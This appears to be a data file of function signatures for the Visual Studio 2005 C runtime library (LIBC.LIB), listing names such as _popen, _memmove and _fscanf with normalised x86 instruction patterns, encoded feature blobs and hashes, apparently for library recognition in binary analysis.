+__fltout,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",3U69twAAAAAAAAAA,fUKLK2gXNlMAAAAAcug6RbbrCof6NnEGtusKhwAAAAAAAAAA+jZxBnLoOkUAAAAA5FK8n31Ciyty6DpFaBc2U3LoOkUAAAAAQvjW1gAAAAAAAAAAcug6RX1CiytGgZLORoGSzkL41tYAAAAAcug6RZdxUZ46MgI8l3FRnmgXNlMAAAAAOjICPGgXNlMAAAAAf2QeHuRSvJ9y6DpF,3361e20f44bf4185a365fb37676ff47edd73e532,VS2005,LIBC.LIB
+__fullpath,"PUSH CONST\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32\nJCC CONST",CGGm53LoOkWchlE4ipI7Qw3MwAEAAAAA34RLAQhhpucZpmb/lapcdTlafGAAAAAAOVp8YAAAAAAAAAAAoBV95AxRQKkUxIhqGaZm/w3MwAEAAAAADczAATlafGAAAAAAGaZm/w3MwAEAAAAADczAATlafGAAAAAAcug6RQ3MwAG7IZT2Jc2z+HLoOkWchlE4FMSIagxRQKkuVbn+uyGU9pWqXHXLAM5LDFFAqQAAAAAAAAAAnIZROBmmZv+KkjtDLlW5/iXNs/jfhEsBywDOSzlafGAAAAAA,[],da0c07d9e15039ed88fb2a20997254d7d0ea5ed8,VS2005,LIBC.LIB
+_wcspbrk,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32\nPUSH R32\nMOV R16,WORD PTR DS:[R32]\nTEST R16,R16\nJCC CONST",4F+9rp7II7Qm7uFlJu7hZTlafGAAAAAAOVp8YAAAAAAAAAAAJu7hZYz41XgAAAAAjPjVeDlafGCeyCO0M1v7MCbu4WVwtgLknsgjtIz41XieyCO0nsgjtOBfva4m7uFlcLYC5OBfva4AAAAA,[],89562441a9ccc47464b990165b7b5347224ac1ae,VS2005,LIBC.LIB
+___crtGetStringTypeA,"LEA ESP,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR FS:[0],R32\nPOP R32\nPOP R32\nPOP R32\nLEAVE\nRETN",Ju7hZeKh3IcAAAAA4qHchwAAAAAAAAAATv0LFCbu4WW7IZT2s6aureKh3IcAAAAAdE5PQ+Kh3IcAAAAA0S3Jeru2XCx/rESsuyGU9uh80Z3gp4E/FjgIIibu4WXndDXJS7Ig7eKh3IcAAAAA4KeBPybu4WUP+Ho67Ymvt079CxQuVbn+DczAAb+iYE8AAAAAv6JgT079CxQuVbn+53Q1ySbu4WVLsiDtqX+m3Sbu4WXtia+36HzRnSbu4WUP+Ho6u7ZcLE79CxQuVbn+f6xErKl/pt0NzMABD/h6OhY4CCIAAAAALlW5/rOmrq10Tk9D,[],0fef621924de0cdbc6dbc65593ac83d36c18fb7a,VS2005,LIBC.LIB
+__fFSINH,FLD1\nFCHS\nFXCH ST(1)\nFSCALE\nJMP CONST,zAIMkIZFco8AAAAAXGHcZzUWchMAAAAAIz2clswCDJAAAAAAhkVyj7LydS8AAAAANRZyEz+x3GQAAAAANRZyEzUWchMAAAAAP7HcZDUWchMAAAAA70by41xh3GcjPZyWsvJ1LwAAAAAAAAAA,[],546be9382e8e44b32c12ff219d7912485dc47cb2,VS2005,LIBC.LIB
+__fFCOSH,CALL CONST\nFLD1\nFCHS\nFXCH ST(1)\nFSCALE\nJMP CONST,NRZyEz+x3GQAAAAAP7HcZDUWchMAAAAAsvJ1LwAAAAAAAAAAPET8SoZFco8AAAAANRZyEzUWchMAAAAA70by4zUWchM8RPxKhkVyj7LydS8AAAAA,[],ac5c7b913f0e7f8bc7d3b39ffc0c730a42c6191e,VS2005,LIBC.LIB
+__popen,"PUSH DWORD PTR SS:[EBP+CONST]\nCALL DWORD PTR DS:[0]\nXOR R32,R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSHL CONST,CONST\nCMP DWORD PTR SS:[EBP+R32+CONST],R32\nJCC CONST",2x7uxibu4WWP4s79Cqtehxh+t95VCbdN+2by4kwvr10Yis13pY7VOKqLb2IV1W2Lj+LO/WHqmGkthlOepkuI+0wvr10Yis13LYZTnibu4WVh6phpYeqYadjNBKaXcVGel3FRnoV99DUAAAAAA78QfaOXw0XP1UuhcISMaUwvr10Yis132M0EpoV99DX9hbf0/YW39Cbu4WUUxIhqFdVti73ytngKq16HhX30NSbu4WUUxIhqpDloGKOXw0VYKnTmz9VLoaQ5aBiljtU4o5fDRaOXw0VYKnTmGIrNd6OXw0VYKnTmVQm3TXCEjGmC9xsJFMSIaqVIkopu0Nc0WCp05qOXw0UAAAAAbtDXNGNpH0MAAAAAo5fDRSbu4WVYKnTmpUiSiqOXw0UDvxB9vfK2eKOXw0VYKnTmWCp05ibu4WUAAAAAO9S9hybu4WXbHu7GgvcbCRh+t967tlwsY2kfQ6OXw0UDvxB9Ju7hZUL41tYAAAAAQvjW1gAAAAAAAAAAu7ZcLHCEjGkYfrfeqotvYqOXw0VYKnTmTC+vXUL41tYAAAAAGH633qZLiPv7ZvLi,[],8f82741d2b37aaebf4c7897a5f1f31b013c217e9,VS2005,LIBC.LIB
+__pclose,"PUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32\nJCC CONST",yM9oigAAAAAAAAAAsPm41sjPaIrcUjwhJAPDnZRSbHBBRdAb3FI8IUFF0BskA8OdZ8xeFsjPaIqw+bjWQUXQG5RSbHAAAAAAlFJscAAAAAAAAAAA,[],9189efbb660816f2408ff9b30c7ad09c5e48419b,VS2005,LIBC.LIB
+?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z,"PUSH R32\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",S6l9YCbu4WWIXCPrJu7hZU+LzAoAAAAA2uGaT8fJRojFnK7lT4vMCgAAAAAAAAAAhQQLwsfJRogAAAAAiFwj6ybu4WXLVXa0x8lGiMrV2YgAAAAAnIZROEupfWCLDRRMJu7hZV5htw8AAAAAiw0UTEupfWA1FnITy1V2tF5htw8AAAAAxZyu5YUEC8IAAAAAytXZiE+LzAom7uFlNRZyE9rhmk8AAAAA7CYplUupfWCchlE4XmG3DwAAAAAAAAAA,[],5c5c3fb1072dd2d08fe123ca0a84bde18616f964,VS2005,LIBC.LIB
+?__CxxRestoreUnhandledExceptionFilter@@YAXXZ,PUSH DWORD PTR DS:[0]\nCALL DWORD PTR DS:[0]\nRETN,HyetMgAAAAAAAAAA,[],ec8283d53cb5d7dd48f8ca342ee525468031745b,VS2005,LIBC.LIB
+?__CxxSetUnhandledExceptionFilter@@YAXXZ,"PUSH CONST\nCALL DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nRETN",s1dvQgAAAAAAAAAA,[],a398be915f9b7b39d682b557d14dccbccc81d4e9,VS2005,LIBC.LIB
+_freopen,"PUSH R32\nCALL CONST\nPOP R32\nPUSH R32\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nXOR R32,R32\nMOV DWORD PTR DS:[R32+CONST],R32",9sNCugAAAAAAAAAAbH6pGgAAAAAAAAAAxNeAT/bDQrpsfqka,[],83d79718e807abd4c1b6fa9e3961a4b90669ccbf,VS2005,LIBC.LIB
+_wcscspn,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32\nPUSH R32\nCMP WORD PTR DS:[R32],0\nJCC CONST",4F+9rgV1n49fQC9l1ZsDxAAAAAAAAAAAX0AvZdWbA8SeyCO0PLhNBtWbA8R97TXpnsgjtIz41XgFdZ+PjPjVeNWbA8SeyCO0fe016QV1n49fQC9lBXWfj+Bfva7VmwPE,[],490ec00c47bfb15d1e41115585373a7092cba3f7,VS2005,LIBC.LIB
+_vprintf,"PUSH R32\nPUSH R32\nMOV R32,CONST\nPUSH R32\nPUSH R32\nCALL CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nMOV R32,R32",YzuaxwAAAAAAAAAA,WNooOk+LzApYWXafR7G+cE+LzApY2ig6KHn2tk+LzAr7LfG4Xk6AaG1kpmL2nGVUWFl2nyh59rYAAAAAT4vMCgAAAAAAAAAAbWSmYkco7JwAAAAAWNooOljaKDoNzMAB9pxlVEco7JwAAAAA+y3xuG1kpmJeToBoDczAASh59rYAAAAARyjsnAAAAAAAAAAA,fcd8afa2e7485f74ff8cb8f39ae1f16166a4ebbe,VS2005,LIBC.LIB
+_memmove,"SHR CONST,CONST\nAND CONST2,CONST\nCMP R32,CONST\nJCC CONST",WNooOobjyugvGjTcrxBtEAAAAAAAAAAASDQjuwAAAAAAAAAAh6NtfSOW2RpY2ig6SDQjuwAAAAAAAAAAI5bZGobjyugvGjTcLxo03BtbYJ0Os0F3huPK6Eg0I7sI/nZxrLCxdVjaKDqHo219CP52cQAAAAAAAAAADrNBdwAAAAAAAAAASDQjuwAAAAAAAAAACP52cQAAAAAAAAAALxo03Eg0I7uvEG0QG1tgnQAAAAAAAAAAhuPK6Eg0I7sI/nZx,[],0c78b090c42b41060d0e37019302528728b730bd,VS2005,LIBC.LIB
+__mbsnicmp,"XOR R32,R32\nINC R32\nMOV R8,R8\nMOV R8,R8\nMOV R32,R32\nCMP R16,BP\nJCC CONST",Xn1cw159XMMk86wymi47p6qT3bIAAAAADczAATNvNx8AAAAA0WZh0159XMNefVzDJPOsMoz41XgAAAAAXn1cw4z41XhefVzDXn1cw159XMMk86wyXn1cw4z41Xgk86wyJPOsMjNvNx8AAAAAJPOsMoz41XgAAAAAXn1cwzNvNx9efVzDzcIRTSbu4WUkA8OdStkitIz41Xju/kswXn1cwzNvNx8k86wyJAPDnQcZS7aaLjunJPOsMjNvNx8AAAAA7v5LMIz41XgAAAAAM38yojNvNx/u/kswjPjVeAA5j7eM+NV4jPjVeCbu4WXOXsA3zl7ANzNvNx8m7uFl7v5LMDNvNx8AAAAAM283H0rZIrSP4s79BxlLtjNvNx8AAAAAJu7hZaqT3bIAAAAAqpPdsgAAAAAAAAAAADmPt6qT3bIAAAAAj+LO/dFmYdMNzMABM283HzN/MqKP4s79DczAAYz41XgAAAAA0WZh0159XMNefVzDj+LO/dFmYdMNzMAB,[],2b5a6c62926d1cfc8a1f83e7e69b5e450e234d11,VS2005,LIBC.LIB
+__dup,"MOV R32,R32\nMOV R32,R32\nSAR R32,CONST\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nMOV R8,BYTE PTR DS:[R32+R32*8+CONST]\nTEST R8,CONST\nJCC CONST",JKOZXC6JAm4AAAAALokCbgAAAAAAAAAAKWi8pczfL6WVUBzMcug6RaunPDI9ZCFoPWQhaCSjmVwAAAAAGaZm/4Ck8f8AAAAArXMWwClovKUZpmb/QweuT8ehFCetcxbAlVAczHLoOkUAAAAAx6EUJySjmVwAAAAAq6c8Mi6JAm4AAAAAzN8vpXLoOkUAAAAAIbyjncehFCdDB65PgKTx/ySjmVwAAAAA,[],b8a7dd43c62c6a560efd5bf59c59df298b73dba2,VS2005,LIBC.LIB
+__execlpe,"PUSH DWORD PTR DS:[R32]\nLEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",I+RHO6Foj01748YLe+PGC3vjxguhaI9NoWiPTQAAAAAAAAAA,[],75f8a7a63e66d35b0d7e31175aebe85a7cd9df8a,VS2005,LIBC.LIB
+__CIlog,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,dqHX0LygXegBoXWzvKBd6AAAAAAAAAAAAaF1swAAAAAAAAAA,9a6bfc6ccf2cdc17e3b0d328a8c54c666c653509,VS2005,LIBC.LIB
+_log,"LEA R32,DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[ESP]\nJCC CONST",6FWr2jfULVPNLBGm0UiUpbOTIAyzkyAMN9QtU9FIlKUAAAAA0UiUpZ8T3I+fE9yPzSwRpjfULVPoVava2OAoGehVq9roVava6FWr2kLuo1HNLBGmAFkkeehVq9r4Pk1X6FWr2tFIlKVWICeY6FWr2uhVq9roVavas5MgDOhVq9oAAAAAzSwRpkLuo1GQ4qERnxPcjwAAAAAAAAAAQu6jUbOTIAyzkyAMViAnmNFIlKUAAAAA6FWr2lYgJ5hC7qNRkOKhEZ8T3I+fE9yP+D5NV+hVq9rY4CgZ,[],38bdcbc1e1ecb7e2cb258925310cb297c737b5d1,VS2005,LIBC.LIB
+__getdiskfree,"ADD R8,CONST\nAND BYTE PTR SS:[EBP+CONST],0\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV BYTE PTR SS:[EBP+CONST],R8\nMOV BYTE PTR SS:[EBP+CONST],CONST\nMOV BYTE PTR SS:[EBP+CONST],CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",HC+VK0+LzAp9yLiqCXYH8Lu2XCwNzMABfci4qgAAAAAAAAAADczAAbyWD2IAAAAAvJYPYk+LzAp9yLiqu7ZcLBwvlSu0bZIRT4vMCgAAAAAAAAAAtG2SEQAAAAAAAAAA,[],eb0f7f9105821c7732da58d80cc18631fcd0806b,VS2005,LIBC.LIB
+_labs,"MOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R32,R32\nJCC CONST",AaF1swAAAAAAAAAAUs42lQAAAAAAAAAAFjgIIgGhdbNSzjaV,[],29e740623a5f08b1d1e1e5309a635bfc227707aa,VS2005,LIBC.LIB
+__wcsupr,"LEA R32,DWORD PTR DS:[R32+R32]\nPUSH R32\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32\nJCC CONST",AOHWawAAAAAAAAAAgXLrz3222tMGgcpPAOHWawAAAAAAAAAABoHKT3222tP0VUzS+SqyQoFy68+cxvMDPIM5ZwAAAAAAAAAA6jKEuL6SefgRlg6RvpJ5+O68llsA4dZrEZYOke68llsA4dZr9FVM0n222tM8gzlnfbba0wAAAAAAAAAAnMbzAwDh1mvuvJZb7ryWW76SefjqMoS4,[],9369e67f1ff18e825b3a35b5c3dab5a0f8676414,VS2005,LIBC.LIB
+__mbsset,"MOV R32,DWORD PTR SS:[ESP+CONST]\nXOR R32,R32\nCMP DWORD PTR DS:[0],R32\nPUSH R32\nMOV R32,R32\nJCC CONST",1X8eHAAAAAAAAAAAJ0aqntV/Hhzteke77XpHu1grj1ZCsxj/QrMY/ydGqp4AAAAA68wJZAAAAAAAAAAAWCuPVidGqp4AAAAAian8PCdGqp4nRqqePzXWOYmp/DzrzAlkJ0aqntV/HhxCsxj/QrMY/ydGqp4AAAAA,[],fda4f91e25bc6273cf1b72029f5ef9693068bace,VS2005,LIBC.LIB
+__flswbuf,"PUSH R32\nCALL CONST\nPOP R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nTEST WORD PTR DS:[R32+CONST],CONST\nPUSH R32\nJCC CONST",uIA9BS6JAm4AAAAArST3Px7+O4YAAAAALYZTnriAPQVOd4J8KrNC3i6JAm4AAAAAUTEX6ru2XCytJPc/LokCbgAAAAAAAAAATneCfFEmumhG/1GARv9RgLiAPQVW8Szdu7ZcLOE4+11I5KeZSOSnmScPdRIAAAAAVvEs3XswP9dY2ig6WNooOi8gf8eIXCPrUSa6aHswP9dY2ig64Tj7XR7+O4YvihCyJw91Eh7+O4YvihCyL4oQsnEp3ZIAAAAAWNooOohcI+tY2ig6Hv47hnEp3ZIAAAAAiFwj67ZSWccvIH/HborSrQHL10Tjoqt8LyB/x26K0q1RMRfqtlJZx26K0q1RMRfqezA/126K0q1RMRfqWGnRSriAPQUthlOecSndkgHL10Tjoqt846KrfCqzQt4AAAAAAcvXRC6JAm4AAAAA,[],ed02c3dd853867d7d51f0de53e3ed338941f6821,VS2005,LIBC.LIB
+_abs,"MOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R32,R32\nJCC CONST",FjgIIgGhdbMm7uFlJu7hZQGhdbMAAAAAAaF1swAAAAAAAAAA,[],4678b15a9d7cf933ee0ff57602bf714331e14bce,VS2005,LIBC.LIB
+__strtime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32",zsi9+gAAAAAAAAAA,[],1d6c3c22bbbde7b57fc4c5ae8065c0c11ef2c6e7,VS2005,LIBC.LIB
+__cenvarg,"MOV R32,R32\nSUB R32,R32\nADD R32,R32\nPUSH R32\nCALL CONST\nPOP R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nTEST R32,R32",xmv3fVGUEGLR5kwxAz2yJOikXWgAAAAA0eZMMcZr930AAAAAiHzE2MZr930AAAAATACoeHkcFju+i05S6KRdaKqT3bIAAAAAUZQQYi5Vuf6XP0guvotOUnkcFjuwnHXcjipXwcZr930AAAAAW9AV4HkcFjuwnHXcsJx13FvQFeB5HBY7lz9ILuikXWgAAAAArydXXKqT3bIAAAAAxmv3fXLoOkWOKlfBJw91EgXCXvowQqavoqojmamzMpgAAAAAqbMymAwm48db56ixLlW5/oy0L8PGa/d9xmv3fUupfWDR5kwxeRwWOwXCXvonD3USFMSIagXCXvonD3US0eZMMcZr930AAAAAJw91EgXCXvonD3USJw91EgXCXvonD3UScug6RdKZOtclUMUujLQvw3+uzNwAAAAAMEKmrxTEiGoAAAAAJVDFLhBvY/KyBKM2W+eosYNLcOQAAAAAEG9j8tKZOtcAAAAAf67M3KKqI5mDS3Dk0pk616qT3bIAAAAABcJe+n+uzNwDPbIkg0tw5KmzMpgAAAAAqpPdsgAAAAAAAAAAorWqmMZr930AAAAAS6l9YEwAqHjZVIgrDCbjx3LoOkWIfMTY2VSIK68nV1xMAKh4sgSjNhBvY/IAAAAA,[],893788c3e66e65639ff16c8ae125697d11c2492d,VS2005,LIBC.LIB
+_realloc,"ADD R32,CONST\nAND R32,CONST\nPUSH R32\nPUSH CONST\nPUSH DWORD PTR DS:[0]\nCALL DWORD PTR DS:[0]\nMOV R32,R32\nTEST R32,R32",50p1vybu4WVy6DpF51wocBY4CCLz1ATmfRd009hHjc41FnIT89QE5qqT3bIAAAAAh6NtfSbu4WVy6DpFNRZyE2Z5MTUAAAAAcug6RV63lwMKhNhyqpPdsgAAAAAAAAAACoTYciQDw51obvZDXreXAyQDw51obvZDJu7hZaqT3bIAAAAAuZvuqmZ5MTUAAAAAZnkxNaqT3bIAAAAAFjgIIthHjc65m+6q2EeNziQDw53jFm3BaG72Q6SsTWSSifuS4xZtwXLoOkVb11Z2kon7knLoOkUAAAAApKxNZHLoOkUAAAAAW9dWdnLoOkWvqNlxr6jZcRZdOvkNzMABcug6Rd6N6gPOEitVzhIrVSbu4WUkA8Od3o3qAybu4WUkA8OdDczAAYejbX0AAAAAFl06+XLoOkVobvZDaG72Q+dKdb+3r8kFcug6RSbu4WUkA8OdJAPDnSbu4WV9F3TTt6/JBSbu4WVy6DpF,[],4b7ecd468a0d66714ac6a40c3cd3eb0dba38faa0,VS2005,LIBC.LIB
+__wsetenvp,"LEA R32,DWORD PTR DS:[R32*4+CONST]\nPUSH R32\nCALL CONST\nMOV R32,R32\nPOP R32\nTEST R32,R32\nMOV DWORD PTR DS:[0],R32\nJCC CONST",2NqdWAAAAAAAAAAAkAJCNZe5I2JOknDeVPTq15ACQjWYECTEsnblk9janVg+Zv37oa9TjhsuW38AAAAAl7kjYpACQjWYECTEh0dSP6GvU44AAAAA9KP+ZhsuW38AAAAATpJw3lT06tdaVB1iCc6a913P6G2yduWTWlQdYpACQjWYECTEXc/obdjanVg+Zv37Gy5bfwnOmvfqMoS4mBAkxAAAAAAAAAAA6jKEuKGvU46HR1I/Pmb9+5e5I2JOknDe,[],7ca06f62d0acc7de5b5f5dd29a53190a6d600c79,VS2005,LIBC.LIB
+_cos,FLD TBYTE PTR DS:[0]\nFXCH ST(1)\nFPREM1\nWAIT\nFSTSW R16\nSAHF\nJCC CONST,b2aGgNFIlKUAAAAAinytBQVtZtAAAAAAj+uX3gVtZtDRSJSlN9QtU9FIlKUAAAAA0UiUpXtGESB7RhEgLLApNwVtZtDRSJSl6FWr2jfULVPNLBGmBW1m0CywKTdvZoaA0UiUpYp8rQWKfK0FzSwRpjfULVOQ4qERe0YRIAAAAAAAAAAALLApNyywKTdvZoaAkOKhEXtGESB7RhEgAFkkeehVq9qc7n8wnO5/MCywKTeP65fe,[],ed242af814640323d4430cc24aa9ed15e8741221,VS2005,LIBC.LIB
+__CIcos,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,dqHX0LygXegBoXWzvKBd6AAAAAAAAAAAAaF1swAAAAAAAAAA,a546b35194009c601768b18e6a48dd7d0d9faa4b,VS2005,LIBC.LIB
+_fscanf,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",bvadnQAAAAAAAAAA,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,1509d67c3643413fbcd68f9b967e0e68625d6714,VS2005,LIBC.LIB
